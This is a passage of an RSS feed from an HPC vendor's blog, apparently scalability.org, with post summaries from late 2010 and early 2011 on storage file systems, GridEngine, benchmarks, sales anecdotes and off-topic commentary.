      <description>Google catches Microsoft with its proverbial hand in the (search) cookie jar &amp;hellip; Microsoft&amp;rsquo;s non-denial denial reads not unlike a Monty Python skit I am fond of. Search for &amp;ldquo;bat&amp;rdquo;. &amp;ldquo;No we didn&amp;rsquo;t!!!&amp;rdquo; then &amp;ldquo;Well, what we meant was &amp;hellip;.&amp;rdquo; heh! That takes cojones!</description>
    </item>
    
    <item>
      <title>2010:  Day job&#39;s best year on record, ever</title>
      <link>https://blog.scalability.org/2011/01/2010-day-jobs-best-year-on-record-ever/</link>
      <pubDate>Mon, 31 Jan 2011 16:57:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/2010-day-jobs-best-year-on-record-ever/</guid>
      <description>Just finished an analysis of last years results. We are a private company, so we don&amp;rsquo;t release financial info (apart from potential investors and those looking to take a stake in the company). We hit 11.7% growth in revenue for the year, and hit a company all time high revenue. This is despite a rather challenging economic environment (to say the least). Costs rose, some &amp;hellip; er &amp;hellip; astoundingly so. Looking to build on this, and accelerate forward.</description>
    </item>
    
    <item>
      <title>Are HPC cloud users expectations realistic?</title>
      <link>https://blog.scalability.org/2011/01/are-hpc-cloud-users-expectations-realistic/</link>
      <pubDate>Sun, 30 Jan 2011 06:15:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/are-hpc-cloud-users-expectations-realistic/</guid>
      <description>Several years ago, before clouds were all the rage, we were working with a large customer discussing an &amp;ldquo;on-demand&amp;rdquo; HPC computing service. This service predated Amazon&amp;rsquo;s setup, and was more in line with what Sabalcore, CRL and others are doing. I remember distinctly from my conversations with the customer that they had particular desires. Specifically, they always wanted to run on the latest/greatest/fastest possible hardware, and not pay any more for this.</description>
    </item>
    
    <item>
      <title>Throwing signs</title>
      <link>https://blog.scalability.org/2011/01/throwing-signs/</link>
      <pubDate>Fri, 28 Jan 2011 03:52:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/throwing-signs/</guid>
      <description>Too funny:
[ ](http://scalability.org/images/geekgangsignsmain11-450x311.jpg)
[had to update, as the folks putting the image up started blocking our link back to them &amp;hellip; I thought we did this correctly &amp;hellip; wasn&amp;rsquo;t trying to steal bandwidth]</description>
    </item>
    
    <item>
      <title>Oh what a day</title>
      <link>https://blog.scalability.org/2011/01/oh-what-a-day/</link>
      <pubDate>Thu, 27 Jan 2011 22:21:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/oh-what-a-day/</guid>
      <description>No details, but this is the sort of day I can do without in terms of excitement. Tonight is fight night in karate. Maybe I can suit up and hit with my good hand. Yeah, it&amp;rsquo;s been one of those days.</description>
    </item>
    
    <item>
      <title>As the high performance storage world evolves ...</title>
      <link>https://blog.scalability.org/2011/01/as-the-high-performance-storage-world-evolves/</link>
      <pubDate>Thu, 27 Jan 2011 05:30:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/as-the-high-performance-storage-world-evolves/</guid>
      <description>Last year, say July time frame, if you asked me to name the top high performance computing file systems, and prognosticate who the up and comers were &amp;hellip; well, you&amp;rsquo;d get lists much like those I&amp;rsquo;ve given here in the past. Lustre was the &amp;ldquo;king&amp;rdquo; and undisputed leader. pNFS was (sorry Bruce and team) effectively perpetually in the future (yeah, sort of like Perl6 &amp;hellip; though we intend to play with both sometime soon &amp;hellip; I hope).</description>
    </item>
    
    <item>
      <title>My kingdom for good error messages ... or something like that</title>
      <link>https://blog.scalability.org/2011/01/my-kingdom-for-good-error-messages-or-something-like-that/</link>
      <pubDate>Tue, 25 Jan 2011 22:58:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/my-kingdom-for-good-error-messages-or-something-like-that/</guid>
      <description>I just spent too long tearing my (altogether far too few remaining) hair(s) out over a driver issue. Qlogic 7240 IB card. Decent DDR unit. Our 2.6.32.22 kernel. Very stable kernel. Rock solid under ridiculous load. OFED 1.5.2 with all the nice bug fixes etc. And inserting/removing qib would cause all manner of kernel hiccups. So much for stability. Well, that is, as long as the ib_ipath.ko, from the kernel RPM, was in there.</description>
    </item>
    
    <item>
      <title>There are times that this is amusing ... other times, not so much</title>
      <link>https://blog.scalability.org/2011/01/there-are-times-that-this-is-amusing-other-times-not-so-much/</link>
      <pubDate>Tue, 25 Jan 2011 18:01:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/there-are-times-that-this-is-amusing-other-times-not-so-much/</guid>
      <description>Customer: Must be something wrong with your gear, because we know what we are doing. Me: Er &amp;hellip; (noting that something that was working correctly before they touched it, is no longer working) &amp;hellip; ok &amp;hellip; so what changes have you made? Customer: Changes? We haven&amp;rsquo;t changed anything! Me: Er &amp;hellip; but it was working, then it stopped working. So what changed? Customer: We just altered the network Me: Ok, now we are onto something (and likely the reason why the &amp;ldquo;equipment is broken&amp;rdquo;) Customer: But we didn&amp;rsquo;t break it &amp;hellip; Me: Yes, I understand.</description>
    </item>
    
    <item>
      <title>Interesting observation with respect to the poll</title>
      <link>https://blog.scalability.org/2011/01/interesting-observation-with-respect-to-the-poll/</link>
      <pubDate>Fri, 21 Jan 2011 17:16:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/interesting-observation-with-respect-to-the-poll/</guid>
      <description>I&amp;rsquo;ve been monitoring the IP addresses and logs on the poll voting. You can vote for more than one item, select several, hit vote, and it generates a cookie so that you won&amp;rsquo;t be able to vote again. That is, unless you take the explicit step of clearing this cookie. And voting again. What this is telling me is that people feel a need not to simply report their (possibly multiple) preferences &amp;hellip; but instead to actively game an informal measurement system.</description>
    </item>
    
    <item>
      <title>Eric Schmidt out in April as CEO of google</title>
      <link>https://blog.scalability.org/2011/01/eric-schmidt-out-in-april-as-ceo-of-google/</link>
      <pubDate>Thu, 20 Jan 2011 21:55:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/eric-schmidt-out-in-april-as-ceo-of-google/</guid>
      <description>See here. Larry Page (U of Mich alum &amp;hellip; woot!*) More power to Larry (and all the other co-founders out there with vision and a desire to get the job done). Don&amp;rsquo;t forget to grow some data center bits here &amp;hellip; it&amp;rsquo;s really cold right now &amp;hellip; no need to spend on cooling for like 6 months out of the year! (not to mention, we have some nice servers we can customize for you!</description>
    </item>
    
    <item>
      <title>Day job: new website about to go up</title>
      <link>https://blog.scalability.org/2011/01/day-job-new-website-about-to-go-up/</link>
      <pubDate>Wed, 19 Jan 2011 21:10:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/day-job-new-website-about-to-go-up/</guid>
      <description>We&amp;rsquo;ve been busy. Real busy. Did I mention we&amp;rsquo;ve been busy? Once the website rolls, please, by all means, let us know if something&amp;rsquo;s broken. Email works. Hopefully we won&amp;rsquo;t melt the server &amp;hellip; [Update] Doug rocks. In case I didn&amp;rsquo;t mention it. He rocks! Site&amp;rsquo;s up with minor breakage (modulo grammar, inconsistent numbers &amp;hellip; ) May need a site breakage bounty. Gonna think about this &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Day job PR: JRTI and Scalable Informatics Form Strategic Partnership</title>
      <link>https://blog.scalability.org/2011/01/day-job-pr-jrti-and-scalable-informatics-form-strategic-partnership/</link>
      <pubDate>Wed, 19 Jan 2011 04:25:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/day-job-pr-jrti-and-scalable-informatics-form-strategic-partnership/</guid>
      <description>Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
 JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU &amp;amp; GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.</description>
    </item>
    
    <item>
      <title>This is good news</title>
      <link>https://blog.scalability.org/2011/01/this-is-good-news/</link>
      <pubDate>Tue, 18 Jan 2011 15:12:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/this-is-good-news/</guid>
      <description>Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah &amp;hellip; I am comfortable with this.</description>
    </item>
    
    <item>
      <title>Call it what it is</title>
      <link>https://blog.scalability.org/2011/01/call-it-what-it-is/</link>
      <pubDate>Sat, 15 Jan 2011 05:07:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/call-it-what-it-is/</guid>
      <description>Saw this on /.
Paraphrasing Shakespeare, a fork by any other name &amp;hellip; Look &amp;hellip; I appreciate that no one wants to call this a fork. Oracle has seemingly abandoned the project and is shopping ownership of the IP around. The choices ahead of the community are: find someone to buy the IP and rally to their leadership, or ignore the IP, rename the project, and fork it. You could always pretend that the IP isn&amp;rsquo;t an issue, that no fork is needed, and then have to do some serious rhetorical contortions to explain why your release isn&amp;rsquo;t a fork.</description>
    </item>
    
    <item>
      <title>Interesting poll on Lustre futures</title>
      <link>https://blog.scalability.org/2011/01/interesting-poll-on-lustre-futures/</link>
      <pubDate>Fri, 14 Jan 2011 21:38:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/interesting-poll-on-lustre-futures/</guid>
      <description>See here on LinkedIn. In case you can&amp;rsquo;t see it, the premise of the question is &amp;ldquo;Would you buy storage based on Lustre&amp;rdquo;, and it specifically points to Rich B&amp;rsquo;s article at InsideHPC. Choices are
 Yes, still Lustre; No, I&amp;rsquo;d choose Panasas; No, I&amp;rsquo;d choose GPFS; No, I&amp;rsquo;d choose Gluster; No, another solution. It&amp;rsquo;s a small, self-selecting, and probably badly biased sample, but what&amp;rsquo;s interesting is that about 20% each seem like they would choose Lustre, Panasas, or another solution and about 40% would choose GPFS, with no one choosing Gluster.</description>
    </item>
    
    <item>
      <title>Its nice to see people seeing what we&#39;ve been predicting</title>
      <link>https://blog.scalability.org/2011/01/its-nice-to-see-people-seeing-what-weve-been-predicting/</link>
      <pubDate>Fri, 14 Jan 2011 16:39:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/its-nice-to-see-people-seeing-what-weve-been-predicting/</guid>
      <description>I could pat my own back on this &amp;hellip; no really, I could. Wouldn&amp;rsquo;t be hard. I&amp;rsquo;ve been talking for a long time about how the HPC market will likely evolve. Hidden within this is how to grow as a business &amp;hellip; serving this need. We&amp;rsquo;ve been predicting that the cloud HPC model will reduce the number of new clusters deployed. Basically, acquisition costs for running a cluster are large, as well as the lifetime costs.</description>
    </item>
    
    <item>
      <title>OT: Ouch !</title>
      <link>https://blog.scalability.org/2011/01/ot-ouch/</link>
      <pubDate>Wed, 12 Jan 2011 14:46:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/ot-ouch/</guid>
      <description>Not that cnbc is the bastion of correct/reliable/accurate reporting, but this article definitely hurts. The &amp;ldquo;American dream&amp;rdquo; has been to own your own house. We bought ours 13 years ago, with a 30 year mortgage. Refinanced 6 years ago to a 20 year mortgage, with the same payments. We assumed the value of the house would be increasing or at worst, staying the same. Last I checked on a few real estate sites, we are &amp;ldquo;underwater or upside-down&amp;rdquo; on the mortgage.</description>
    </item>
    
    <item>
      <title>Worth asking again ... does Lustre have a future?</title>
      <link>https://blog.scalability.org/2011/01/worth-asking-again-does-lustre-have-a-future/</link>
      <pubDate>Wed, 12 Jan 2011 06:28:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/worth-asking-again-does-lustre-have-a-future/</guid>
      <description>This is going to sound like a strange question to ask. Yes &amp;hellip; I know it is a strange question to ask given the events of the past few months. A long while ago, I postulated that Lustre&amp;rsquo;s future was (no pun intended) cloudy at best. That Sun/Oracle had an uncertain level of commitment to it, and Larry Ellison is a businessman, and doesn&amp;rsquo;t run a charity &amp;hellip; there aren&amp;rsquo;t any freebies he is likely to fund forever.</description>
    </item>
    
    <item>
      <title>I had read it right ...</title>
      <link>https://blog.scalability.org/2011/01/i-had-read-it-right/</link>
      <pubDate>Wed, 12 Jan 2011 05:52:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/i-had-read-it-right/</guid>
      <description>A partner was working with us on an opportunity. At some point in the process, the customer tripped my alarms. This was going well into 2x4 material (e.g. our proposal wasn&amp;rsquo;t going to be seriously considered). I shared my thoughts with the partner. They wanted to press ahead. Sure enough, we got word of our 2x4-ness today. Nice to know we helped a customer beat a competitor up. Well, no, not really.</description>
    </item>
    
    <item>
      <title>Some nice announcements coming out next week</title>
      <link>https://blog.scalability.org/2011/01/some-nice-announcements-coming-out-next-week/</link>
      <pubDate>Fri, 07 Jan 2011 18:57:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/some-nice-announcements-coming-out-next-week/</guid>
      <description>from the $day job. Stay tuned.</description>
    </item>
    
    <item>
      <title>The bandwidth wall: aka a 19.2 TB write sprint; how fast can your storage do it?</title>
      <link>https://blog.scalability.org/2011/01/the-bandwidth-wall-aka-a-19-2-tb-write-sprint-how-fast-can-your-storage-do-it/</link>
      <pubDate>Fri, 07 Jan 2011 18:54:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/the-bandwidth-wall-aka-a-19-2-tb-write-sprint-how-fast-can-your-storage-do-it/</guid>
      <description>[root@jr5-lab ~]# fio sw.fio Run status group 0 (all jobs): WRITE: io=19,200GB, aggrb=2,323MB/s, minb=2,379MB/s, maxb=2,379MB/s, mint=8463222msec, maxt=8463222msec  That&amp;rsquo;s 8463.2 seconds to you and me. 2.351 hours. 8.17TB/hour And we didn&amp;rsquo;t even fill the unit up. This is what we mean by a low bandwidth wall. You can conceivably read/write the entire storage in a time comparable to single hours. If your platform can&amp;rsquo;t handle this (and most can&amp;rsquo;t), then you have a very high wall erected between you and your data.</description>
    </item>
    
    <item>
      <title>Lab JR5 quickie benchmarks</title>
      <link>https://blog.scalability.org/2011/01/lab-jr5-quickie-benchmarks/</link>
      <pubDate>Fri, 07 Jan 2011 15:32:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/lab-jr5-quickie-benchmarks/</guid>
      <description>I&amp;rsquo;ve seen some clustered file system results a few months ago where the vendor was happy to sustain something like 1.4 GB/s during their IO operations, and called this good. Something like 60 disks. Lustre, and some other bits. Their approach (and most people&amp;rsquo;s approach) in this space is to start with a bunch of demonstrably slow servers/disks, and aggregate them. Which eventually gets you to the performance you are looking for, albeit with low performance density, large expenditure of capital, large investment in space/power/cooling.</description>
    </item>
    
    <item>
      <title>Interesting (re)entre into the deskside/server side</title>
      <link>https://blog.scalability.org/2011/01/interesting-reentre-into-the-desksideserver-side/</link>
      <pubDate>Wed, 05 Jan 2011 23:29:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/interesting-reentre-into-the-desksideserver-side/</guid>
      <description>I had expected NVidia to do something. AMD and Fusion. Intel with AVX (Larrabee, et al.) and integrated video. NVidia had to either develop its own processor, buy a design/company, or fight a battle in the future it would likely lose &amp;hellip; not due to the quality of the competitors or their parts, but simply because the deck was stacked against it. Their direction is interesting. Going ARM and a fusion like thing as a CPU + GPU (though I doubt they will call it an APU &amp;hellip; they are all about the APU &amp;hellip; where A==G).</description>
    </item>
    
    <item>
      <title>As good as my 2x4 detector is, it&#39;s still not perfect</title>
      <link>https://blog.scalability.org/2011/01/as-good-as-my-2x4-detector-is-its-still-not-perfect/</link>
      <pubDate>Wed, 05 Jan 2011 20:57:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/as-good-as-my-2x4-detector-is-its-still-not-perfect/</guid>
      <description>We don&amp;rsquo;t like being used as a 2x4 (two-by-four) &amp;hellip; basically a heavy chunk of wood used to beat someone into submission. Some of the surest signs of 2x4-dom are when we are asked for an onsite loaner. The theory behind this is supposed to be that a customer will evaluate a unit in their environment, give it a rigorous going over, and then make a purchase decision based upon that.</description>
    </item>
    
    <item>
      <title>Churchillian thoughts .... about grub</title>
      <link>https://blog.scalability.org/2011/01/churchillian-thoughts-about-grub/</link>
      <pubDate>Wed, 05 Jan 2011 19:27:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/churchillian-thoughts-about-grub/</guid>
      <description>Ahh &amp;hellip; grub. That boot loader. The one that &amp;hellip; after interacting with &amp;hellip; you wish you didn&amp;rsquo;t have to. Just had some fun a few minutes ago on a Lustre upgrade. Some of the grub tools are slightly broken, many are horribly, irretrievably borked. And they will do bad things to you. To your disk. Paraphrasing Churchill, grub is the worst bootloader, except for all the rest. I&amp;rsquo;ll argue that it&amp;rsquo;s marginally better than lilo.</description>
    </item>
    
    <item>
      <title>Projects for the new year ...</title>
      <link>https://blog.scalability.org/2011/01/projects-for-the-new-year/</link>
      <pubDate>Wed, 05 Jan 2011 12:52:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/projects-for-the-new-year/</guid>
      <description>Some near term &amp;hellip; some far term. Pragmatic projects:
 Dust. Almost to the point where I am happy releasing it. Will have ~6 driver packs, a spec, a user tool, and a roadmap when I am done. Think of it as a DKMS that works, and what it could have been. Lustre. We have operational Lustre builds from the git tree, though these are 2.x builds, and not 1.8.x builds.</description>
    </item>
    
    <item>
      <title>Goodbye GridEngine ...</title>
      <link>https://blog.scalability.org/2011/01/goodbye-gridengine/</link>
      <pubDate>Mon, 03 Jan 2011 22:41:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/goodbye-gridengine/</guid>
      <description>Well, sort of. It&amp;rsquo;s morphed into something not quite open source, with not enough of a community around it to sustain it from a development sense, as the corporate owner goes their own direction. I understand their decision, and I respect it &amp;hellip; its their (Oracle&amp;rsquo;s) IP. I don&amp;rsquo;t have to like it though. So we are migrating our internal queueing to Torque for the moment. Thinking about Slurm. Basically all of this will be hidden behind some of our tools, but still &amp;hellip; we&amp;rsquo;ve been using SGE since before it was Sun&amp;rsquo;s (or Grid Engine).</description>
    </item>
    
    <item>
      <title>Changing commenting</title>
      <link>https://blog.scalability.org/2010/12/changing-commenting/</link>
      <pubDate>Thu, 30 Dec 2010 18:48:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/changing-commenting/</guid>
      <description>Quick note: Spammers are attempting to abuse the system, so I am implementing some measures to reduce this.</description>
    </item>
    
    <item>
      <title>OT: Watching &#34;The empire strikes back&#34; and wondering if Vader meant this ...</title>
      <link>https://blog.scalability.org/2010/12/ot-watching-the-empire-strikes-back-and-wondering-if-vader-meant-this/</link>
      <pubDate>Sat, 25 Dec 2010 20:07:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-watching-the-empire-strikes-back-and-wondering-if-vader-meant-this/</guid>
      <description>Google your feelings Luke &amp;hellip;
[ ](http://scalability.org/images/search_your_feelings_Luke.png)
The HPC tie in was the significant use of some computing power for rendering by George Lucas and company to provide some of the special effects. Aside from this, I am sure Vader didn&amp;rsquo;t mean &amp;ldquo;google your feelings, Luke&amp;rdquo; &amp;hellip;</description>
    </item>
    
    <item>
      <title>OT: As if the previous attacks on the NSF weren&#39;t enough ...</title>
      <link>https://blog.scalability.org/2010/12/ot-as-if-the-previous-attacks-on-the-nsf-werent-enough/</link>
      <pubDate>Fri, 24 Dec 2010 14:05:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-as-if-the-previous-attacks-on-the-nsf-werent-enough/</guid>
      <description>There is this. The problem is, fundamentally, any program requesting money from the government becomes a political football. So the NSF or NIH programs are open to scrutiny. That part is fine. Pulling lawyer tricks to selectively (mis)quote? Not so fine. It&amp;rsquo;s bad enough when AGW activists incorrectly opine that the science is settled, and make a mockery of those with the temerity to question the &amp;ldquo;settled&amp;rdquo; science. It&amp;rsquo;s just as bad when the partisans in government misuse grant information to attack small programs as being wasteful, without a deeper understanding of the context and value of these programs.</description>
    </item>
    
    <item>
      <title>OT: faux-curity gone horribly awry</title>
      <link>https://blog.scalability.org/2010/12/ot-faux-curity-gone-horribly-awry/</link>
      <pubDate>Fri, 24 Dec 2010 13:51:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-faux-curity-gone-horribly-awry/</guid>
      <description>Call this, &amp;ldquo;shooting the messenger&amp;rdquo;. Call this, pointing out glaring flaws. Call this &amp;hellip; well &amp;hellip; for what it is &amp;hellip; disgusting. It raises the question of whether this is the US, or the USSR. Don&amp;rsquo;t anger the government by pointing out the flaws in one of their systems. There&amp;rsquo;s a series of ironic humor jokes, ones that aren&amp;rsquo;t that funny, but more ominous, that start out &amp;ldquo;In Soviet Union, &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Wondering out loud here ... bear with me</title>
      <link>https://blog.scalability.org/2010/12/wondering-out-loud-here-bear-with-me/</link>
      <pubDate>Thu, 23 Dec 2010 04:45:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/wondering-out-loud-here-bear-with-me/</guid>
      <description>After the last post on Atrato, I am thinking that VC money might be better invested in proven real businesses. Those that have survived a number of years, through hardship and through growth. There is less risk there. Ok, the VC model is fundamentally built upon taking a risk on a company. As the spate of failures in (many) markets shows, rewards are few and far between, while risks aren&amp;rsquo;t seemingly ameliorated by what the VCs do.</description>
    </item>
    
    <item>
      <title>... and Atrato goes under</title>
      <link>https://blog.scalability.org/2010/12/and-atrato-goes-under/</link>
      <pubDate>Thu, 23 Dec 2010 03:27:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/and-atrato-goes-under/</guid>
      <description>Who, you might ask, is Atrato? A few years ago, they were pushing some sealed units that did &amp;ldquo;self healing&amp;rdquo;. That is, you never had to replace hard disks. They had some nice features, some venture money. What they never really got was traction. The concept was interesting, but as with all sealed and extremely proprietary designs, they weren&amp;rsquo;t able to convert their supposed advantages into sales. This can happen for many reasons.</description>
    </item>
    
    <item>
      <title>Saying &#34;no&#34;</title>
      <link>https://blog.scalability.org/2010/12/saying-no/</link>
      <pubDate>Wed, 22 Dec 2010 00:36:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/saying-no/</guid>
      <description>Sometimes the sales process delves into the ridiculous. This is when the value proposition has failed, and the customer starts asking for bill of materials. Imagine if you will, apart from the ingredients listed on a package of food, you asked the vendor of said food to describe the exact amounts, the source of each (brand, sku or part number, &amp;hellip;), the make and model of your oven, the make and model of everything you will use in the preparation of said food.</description>
    </item>
    
    <item>
      <title>Advantages of Michigan USA for HPC (and data centers)</title>
      <link>https://blog.scalability.org/2010/12/advantages-of-michigan-usa-for-hpc-and-data-centers/</link>
      <pubDate>Tue, 21 Dec 2010 23:14:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/advantages-of-michigan-usa-for-hpc-and-data-centers/</guid>
      <description>itssssss freaking cccccoooolllddddd Open the doors, let the outdoor air in. Our heater is running in the lab (large warehouse-like space). Can&amp;rsquo;t wait to start running the 5 ton AC unit next year. Right now, we have natural AC. Seriously &amp;hellip; nice area for many reasons (low costs all around), and with some cleverness in the cooling/heating work, you could significantly reduce overall yearly heating/cooling costs &amp;hellip;</description>
    </item>
    
    <item>
      <title>should give everyone pause, and force a serious consideration of the risks of cloud and hosting</title>
      <link>https://blog.scalability.org/2010/12/should-give-everyone-pause-and-force-a-serious-consideration-of-the-risks-of-cloud-and-hosting/</link>
      <pubDate>Mon, 20 Dec 2010 14:23:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/should-give-everyone-pause-and-force-a-serious-consideration-of-the-risks-of-cloud-and-hosting/</guid>
      <description>See this article. Yes, this deals with a hosting data center, but notice that some of the companies swept up in the sting&amp;rsquo;s removal of machines had &amp;ldquo;cloud&amp;rdquo; projects of varying types. This gets to the risk of hosting or projecting important aspects into the cloud. I am not saying &amp;ldquo;don&amp;rsquo;t do it.&amp;rdquo; On the contrary, I&amp;rsquo;d say make sure you have a backup of your data and functions in such a way that you can trivially switch between services.</description>
    </item>
    
    <item>
      <title>I wish cloning were legal in Michigan ... and wish it worked ...</title>
      <link>https://blog.scalability.org/2010/12/i-wish-cloning-were-legal-in-michigan-and-wish-it-worked/</link>
      <pubDate>Mon, 20 Dec 2010 07:03:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/i-wish-cloning-were-legal-in-michigan-and-wish-it-worked/</guid>
      <description>To code or not to code &amp;hellip; that is the question. Seriously &amp;hellip; my time is a zero sum game. I can&amp;rsquo;t run as many threads on my CPU as I wish &amp;hellip; it&amp;rsquo;s hard to code and debug and sell and service all at once. Gonna have to get some hiring going. Or some cloning. Gaak &amp;hellip;</description>
    </item>
    
    <item>
      <title>How to deliver an application to end users which depends upon things they don&#39;t have</title>
      <link>https://blog.scalability.org/2010/12/how-to-deliver-an-application-to-end-users-which-depends-upon-things-they-dont-have/</link>
      <pubDate>Mon, 20 Dec 2010 02:22:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/how-to-deliver-an-application-to-end-users-which-depends-upon-things-they-dont-have/</guid>
      <description>This is the question I have for dust. Almost ready for initial release. Fixed most everything, and the one thing we are &amp;ldquo;punting&amp;rdquo; on is actually less being punted and more being worked around until we can get a better solution in place. The specs for it will be on the site soon, too. Ok &amp;hellip; so assume a pure Redhat or Centos system (will work with others as well) for the moment.</description>
    </item>
    
    <item>
      <title>Computer terms applied to ... er ... other devices</title>
      <link>https://blog.scalability.org/2010/12/computer-terms-applied-to-er-other-devices/</link>
      <pubDate>Mon, 20 Dec 2010 01:24:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/computer-terms-applied-to-er-other-devices/</guid>
      <description>Saw a link to this at troglopundit after hearing that the Detroit Lions had somehow, miraculously, won another game. Restore the roar
Heh! (don&amp;rsquo;t know if I agree with the reading material on the lower left &amp;hellip; we have lots of kids books, fiction, histories, and other as our &amp;ldquo;supplementary data&amp;rdquo; &amp;hellip; to each their own). Follow the link (if you dare) by clicking on the image. This will take you to the page it was on (where I found it linked from after the search), where they have the Zombie food group.</description>
    </item>
    
    <item>
      <title>OT:  A good concept with a really bad initial approach</title>
      <link>https://blog.scalability.org/2010/12/ot-a-good-concept-with-a-really-bad-initial-approach/</link>
      <pubDate>Sat, 18 Dec 2010 16:16:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-a-good-concept-with-a-really-bad-initial-approach/</guid>
      <description>See this. The concept, reviewing programs for potential waste, is great. That&amp;rsquo;s wonderful. Looks like @GOPWhip was busy getting concepts together. What&amp;rsquo;s really bad about this? It starts out targeting the NSF, which is a minuscule &amp;hellip; tiny &amp;hellip; fraction of the federal budget, and one of the only aspects of the federal budget that has a net ROI. We get positive impact from this investment, which, apart from the NIH and a few other programs, we don&amp;rsquo;t get in general from government expenditure.</description>
    </item>
    
    <item>
      <title>I have to admit ... the hardest thing about this business is getting closure</title>
      <link>https://blog.scalability.org/2010/12/i-have-to-admit-the-hardest-thing-about-this-business-is-getting-closure/</link>
      <pubDate>Fri, 17 Dec 2010 18:07:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/i-have-to-admit-the-hardest-thing-about-this-business-is-getting-closure/</guid>
      <description>This is more of a business general issue than an HPC business issue per se. We have lots of conversations with customers. We do lots of RFP responses. And we win some and we lose some. But the thing I find hardest to deal with is potential customers going mute for long durations. Maybe there is nothing to report, maybe people don&amp;rsquo;t want to speak after making their decisions. Whatever the reason.</description>
    </item>
    
    <item>
      <title>OT: Faux-security</title>
      <link>https://blog.scalability.org/2010/12/ot-faux-security/</link>
      <pubDate>Fri, 17 Dec 2010 17:19:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-faux-security/</guid>
      <description>Sigh. Money quote:
Yeah, these are older data, but the problem is &amp;hellip;
The Walmartization of security. And then:
So &amp;hellip; they seem to have not noticed that these new techniques and machines &amp;hellip; don&amp;rsquo;t really help. Our tax dollars at work.</description>
    </item>
    
    <item>
      <title>HPC sales viewed in the context of watching a horror show ...</title>
      <link>https://blog.scalability.org/2010/12/hpc-sales-as-a-participant-in-a-horror-show/</link>
      <pubDate>Wed, 15 Dec 2010 22:08:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/hpc-sales-as-a-participant-in-a-horror-show/</guid>
      <description>So we have a number of customers looking at particular configurations. Like many others, they get quotes from all over. Including from companies that don&amp;rsquo;t really have the slightest clue about what is being asked of them. Which means we, as often as not, get quotes tossed back to us with a note saying &amp;ldquo;you are at too high a price&amp;rdquo;. While the quotes they are comparing to aren&amp;rsquo;t even meeting the basic spec.</description>
    </item>
    
    <item>
      <title>OT:  disappointed with the firewall distros I&#39;ve looked at</title>
      <link>https://blog.scalability.org/2010/12/ot-disappointed-with-the-firewall-distros-ive-looked-at/</link>
      <pubDate>Wed, 15 Dec 2010 20:40:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-disappointed-with-the-firewall-distros-ive-looked-at/</guid>
      <description>We&amp;rsquo;ve been looking at building a gateway/firewall machine, with load balancing, failover, and many other nice features. For security purposes, we&amp;rsquo;ve wanted to run it in a very particular way. All the distributions we&amp;rsquo;ve tried: ClearOS, Vyatta, Endian, IPFire, Zentyal &amp;hellip; all of them &amp;hellip; sorta &amp;hellip; kinda &amp;hellip; did what we wanted. Sorta. Kinda. But not quite.
ClearOS never worked. I mean it installed, configured, but it could never pass packets correctly.</description>
    </item>
    
    <item>
      <title>JR4/DV4 design change</title>
      <link>https://blog.scalability.org/2010/12/jr4dv4-design-change/</link>
      <pubDate>Wed, 15 Dec 2010 14:58:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/jr4dv4-design-change/</guid>
